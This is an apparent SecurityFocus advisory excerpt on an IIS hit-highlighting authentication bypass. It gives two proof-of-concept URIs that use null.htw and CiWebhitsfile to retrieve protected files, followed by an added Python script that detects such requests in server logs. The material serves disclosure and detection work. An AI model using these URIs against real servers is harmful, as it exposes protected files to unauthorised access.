Microsoft Internet Information Server Hit Highlighting Authentication Bypass Vulnerability

Attackers can use a browser to exploit this issue.

The following proof-of-concept URIs are available:

https://www.example.com/authBypass/null.htw?CiWebhitsfile=/protectedfile.aspx&CiRestriction=b&CiHiliteType=full
https://www.example.com/authBypass/null.htw?CiWebhitsfile=/some/secretfile.txt&CiRestriction=b&CiHiliteType=full
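
For detection, requests of this shape can be found in web server logs. The following is an added example, not part of the original advisory: it assumes IIS W3C extended logs that carry a `#Fields:` header, and the log lines, client addresses and the function name `find_webhits_requests` are constructed for illustration.

```python
from urllib.parse import parse_qsl

# Constructed W3C extended log lines; client addresses are documentation ranges.
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query cs-username c-ip sc-status
2010-01-01 10:00:01 GET /default.aspx - - 192.0.2.10 200
2010-01-01 10:00:05 GET /authBypass/null.htw CiWebhitsfile=/protectedfile.aspx&CiRestriction=b&CiHiliteType=full - 198.51.100.7 200
2010-01-01 10:00:09 GET /AUTHBYPASS/NULL.HTW ciwebhitsfile=%2Fsome%2Fsecretfile.txt&cirestriction=b&cihilitetype=full - 198.51.100.7 200
2010-01-01 10:00:12 GET /search/query.htw CiRestriction=b - 192.0.2.44 404
"""

def find_webhits_requests(log_text):
    """Return one finding per request to a .htw resource that names a file via CiWebhitsfile."""
    fields, findings = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # column names for the entries that follow
            continue
        if not line.strip() or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split()))
        if not row.get("cs-uri-stem", "").lower().endswith(".htw"):
            continue
        # Parameter names are matched case-insensitively; values are percent-decoded.
        params = {k.lower(): v for k, v in parse_qsl(row.get("cs-uri-query", ""))}
        target = params.get("ciwebhitsfile")
        if target is None:
            continue
        findings.append({
            "client": row.get("c-ip"),
            "target": target,                      # file the request asked to highlight
            "status": row.get("sc-status"),
            "anonymous": row.get("cs-username") == "-",  # no authenticated user logged
        })
    return findings

if __name__ == "__main__":
    for finding in find_webhits_requests(SAMPLE_LOG):
        print(finding)
```

A finding with `anonymous` set and a 200 status for a file that normally requires authentication is the combination to review first.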

The following exploit is available:


 

Copyright 2010, SecurityFocus